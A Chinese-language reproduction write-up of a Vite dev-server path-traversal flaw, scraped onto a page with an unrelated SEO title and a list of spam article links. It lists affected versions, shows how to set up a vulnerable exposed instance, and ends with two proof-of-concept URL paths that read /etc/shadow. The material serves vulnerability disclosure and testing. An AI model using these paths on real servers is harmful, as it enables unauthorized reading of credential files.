当前位置: 首页 > wzjs >正文

网站策划主要做什么工作wordpress分类目录显示摘要

wzjs 2025/9/2 9:38:15
网站策划主要做什么工作,wordpress分类目录显示摘要,设计开发输入清单,网络营销意思漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x

http://www.dtcms.com/wzjs/579795.html

相关文章:

  • 营销型网站管理系统网站开发技巧
  • 做购物网站表结构分析0735郴州新网
  • 购物网站建设案例百度青岛代理公司
  • 织梦移动网站模板东莞网站建设化工
  • ui设计 接单网站无锡网站建设设计
  • 企业微信网站建设外贸网站图片素材
  • ps做网站头部西餐厅网站源码
  • 济南网站建设找凌峰ui设计在哪个网站可以接做
  • 怎样用编程语言做网站wordpress怎么加入播放器
  • 网站推广公司汉狮网络一个网站里面只放一个图片怎么做
  • 做百度手机网站优django 开放api 做网站
  • 做导航网站怎么赚钱网站建设需要注意哪些内容
  • flash 做ppt的模板下载网站网站建设 图纸网
  • php网站开发apiwordpress设置禁止蜘蛛抓取
  • 文库网站建设开发wordpress照片投票插件
  • 企业做门户网站的重要性工作计划及目标
  • 网站建设的市场调研分析wordpress菜鸟教程
  • 腾讯云如何做网站做苗木网站哪家好
  • 网站建设中单页源码建站网站免费
  • 烟台企业网站旅游前 做攻略有什么网站好用
  • 建设部科研申报网站用着不好搜狗不收录 wordpress
  • 江北区城乡建设部网站首页北京培训seo哪个好
  • 通州网站网站建设网站上怎么做通栏的图片
  • 福建省建设局实名制网站wordpress 国内知名
  • 中山企业手机网站建设电子商务网站开发岗位
  • 石排仿做网站专业网站建设公司
  • 免费下载简历模板网站玉环做网站
  • 网站建设前期如何规划免费查公司
  • qq怎么做自己的网站班级网页制作模板
  • 棋牌网站专业建站流程